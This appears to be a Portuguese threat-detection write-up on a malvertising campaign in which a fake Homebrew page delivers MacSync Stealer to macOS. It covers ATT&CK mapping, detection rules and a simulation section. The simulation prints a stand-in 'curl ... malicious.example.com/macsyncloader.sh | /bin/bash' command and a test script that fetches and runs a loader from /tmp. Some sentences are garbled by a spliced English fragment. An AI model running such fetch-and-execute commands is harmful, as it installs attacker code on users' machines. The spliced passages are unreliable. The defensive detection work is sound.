Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Os atacantes estão usando anúncios de busca maliciosos para direcionar usuários a um site falso do Homebrew que mira sistemas macOS com o MacSync Stealer. A página falsificada instrui as vítimas a copiar e executar um comando de shell que baixa e executa o malware. Uma vez ativo, o stealer coleta credenciais e detalhes do sistema, compacta os dados roubados em um arquivo ZIP e os envia para um servidor de comando e controle. A campanha destaca o crescente uso de malvertising para comprometer usuários de macOS.
Investigação
O analista rastreou o ataque do anúncio malicioso para uma página do Homebrew falsificada hospedada no Google Sites. Essa página apresentou um zsh comando que, ao ser executado, baixou scripts adicionais de uma infraestrutura controlada por atacantes e criou um arquivo ZIP temporário contendo dados coletados. O tráfego de rede confirmou que o arquivo foi exfiltrado para o domínio glowmedaesthetics.com. Pesquisadores documentaram os indicadores relevantes, incluindo URLs, domínios e caminhos de arquivos ligados à cadeia de infecção.
Mitigação
Os usuários devem evitar copiar e executar comandos de sites não confiáveis e devem verificar a legitimidade de páginas de gerenciadores de pacotes antes de interagir com elas. Extensões de navegador de bloqueio de anúncios ou focadas em segurança podem ajudar a reduzir a exposição a links patrocinados maliciosos. No macOS, o Gatekeeper deve permanecer habilitado e a execução de aplicações deve ser limitada a softwares confiáveis e assinados. Defensores também devem monitorar o tráfego de saída para conexões com domínios desconhecidos.
Resposta
As equipes de segurança devem detectar a execução do zsh comando suspeito e qualquer atividade curl alcançando a URL maliciosa identificada. Alertas também devem ser gerados para a criação do activity reaching the identified malicious URL. Alerts should also be generated for creation of the /tmp/osalogging.zip arquivo e para o tráfego de saída para glowmedaesthetics.com. Se houver suspeita de infecção, isole o sistema afetado, colete evidências forenses e redefina quaisquer credenciais comprometidas.
"graph TB %% Class Definitions classDef technique fill:#99ccff %% Node definitions initial_malicious_link["<b>Technique</b> – <b>T1204.001 Malicious Link</b><br/><b>Description</b>: A vítima clica em uma URL maliciosa em um anúncio e é direcionada para uma página de download falsificada do Homebrew."] class initial_malicious_link technique user_copy_paste["<b>Technique</b> – <b>T1204.004 Malicious Copy and Paste</b><br/><b>Description</b>: A vítima copia um script elaborado da página e o cola no Terminal, executando o código do atacante."] class user_copy_paste technique unix_shell["<b>Technique</b> – <b>T1059.004 Unix Shell</b><br/><b>Description</b>: O script Zsh roda, baixando carga adicional de glowmedaesthetics.com."] class unix_shell technique gui_input_capture["<b>Technique</b> – <b>T1056.002 GUI Input Capture</b><br/><b>Description</b>: Um pedido falso de senha gráfica captura a senha do usuário macOS."] class gui_input_capture technique local_data_staging["<b>Technique</b> – <b>T1074.001 Local Data Staging</b><br/><b>Description</b>: Informações do sistema e logs são arquivados em /tmp/osalogging.zip para exfiltração posterior."] class local_data_staging technique exfiltration_c2["<b>Technique</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/><b>Description</b>: O arquivo zip é enviado para o servidor C2 do atacante por HTTPS."] class exfiltration_c2 technique gather_software_info["<b>Technique</b> – <b>T1592.002 Software</b><br/><b>Description</b>: O script enumera softwares instalados para criar um inventário do host da vítima."] class gather_software_info technique data_local_system["<b>Technique</b> – <b>T1005 Data from Local System</b><br/><b>Description</b>: Lê arquivos locais adicionais para incluir no arquivo exfiltrado."] class data_local_system technique %% Connections initial_malicious_link –>|conduz_a| user_copy_paste user_copy_paste –>|conduz_a| unix_shell unix_shell –>|conduz_a| gui_input_capture gui_input_capture –>|conduz_a| local_data_staging local_data_staging –>|conduz_a| exfiltration_c2 local_data_staging –>|também conduz_a| gather_software_info local_data_staging –>|também conduz_a| data_local_system "
Fluxo de Ataque
Detecções
Possível Manipulação de Strings Codificadas em Base64 [MacOS] (via linha de comando)
Visualizar
Arquivo Foi Criado na Pasta Temporária do MacOS (via evento_de_arquivo)
Visualizar
IOCs (HashSha256) para detectar: Anúncio Malicioso para Homebrew Conduz ao MacSync Stealer
Visualizar
Detecção da Instalação do MacSync Stealer através de Página Falsa do Homebrew [Criação de Processo no Linux]
Visualizar
Execução de Simulação
Pré-requisito: A Verificação Prévia do Telemetria e Base de Referência deve ter sido aprovada.
Fundamentação: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.
-
Narrativa do Ataque e Comandos:
-
Armadilha Inicial: A vítima recebe um e-mail de phishing contendo um link para uma página de “tap” falsificada de Homebrew que hospeda um script de instalação malicioso.
-
Execução: A vítima copia a linha única da página e a cola em seu terminal:
curl -fsSL https://malicious.example.com/macsyncloader.sh | /bin/bash- The
atividade curl alcançando a URL maliciosa identificada. Alertas também devem ser gerados para a criação dobinário é invocado (corresponde à regra).
- The
-
Script Downloader (
macsyncloader.sh):- Baixa a carga do MacSync via
atividade curl alcançando a URL maliciosa identificada. Alertas também devem ser gerados para a criação do. - Escreve a carga em
/tmp/.macsynce a executa. - Abre diálogos para roubo de credenciais (simulado via
osascriptno macOS, mas aqui apenas damos echo).
- Baixa a carga do MacSync via
-
Persistência: O script registra um LaunchAgent para rodar no login (fora do escopo da regra atual, mas relevante para uma detecção mais ampla).
-
-
Script de Teste de Regressão: O seguinte script Bash reproduz os passos exatos, garantindo que a telemetria se alinhe com a lógica de detecção.
#!/usr/bin/env bash set -euo pipefail # ------------------------------------------------- # Servidor simulado controlado por atacante # ------------------------------------------------- MALICIOUS_HOST="https://malicious.example.com" LOADER="${MALICIOUS_HOST}/macsyncloader.sh" # ------------------------------------------------- # Passo 1: Baixar e executar o loader malicioso # ------------------------------------------------- echo "[*] Acionando a regra de detecção ao invocar curl ..." curl -fsSL "$LOADER" | /bin/bash # ------------------------------------------------- # Passo 2: (Dentro do loader) – Carga Simulada # ------------------------------------------------- # O loader normalmente seria buscado do host remoto. # Para o propósito deste teste, incorporamos a carga embutida. cat <<'PAYLOAD' > /tmp/.macsync #!/usr/bin/env bash echo "MacSync payload executado – exfiltrando informações do host..." # Simula captura de credenciais (sem dados reais) echo "Credenciais coletadas: usuario@exemplo.com / senha123" PAYLOAD chmod +x /tmp/.macsync /tmp/.macsync echo "[*] Simulação completa." -
Comandos de Limpeza: Remova artefatos e termine quaisquer processos remanescentes.
#!/usr/bin/env bash set -euo pipefail echo "[*] Limpando artefatos da simulação ..." rm -f /tmp/.macsync # Nenhum serviço persistente foi criado neste teste echo "[*] Limpeza finalizada."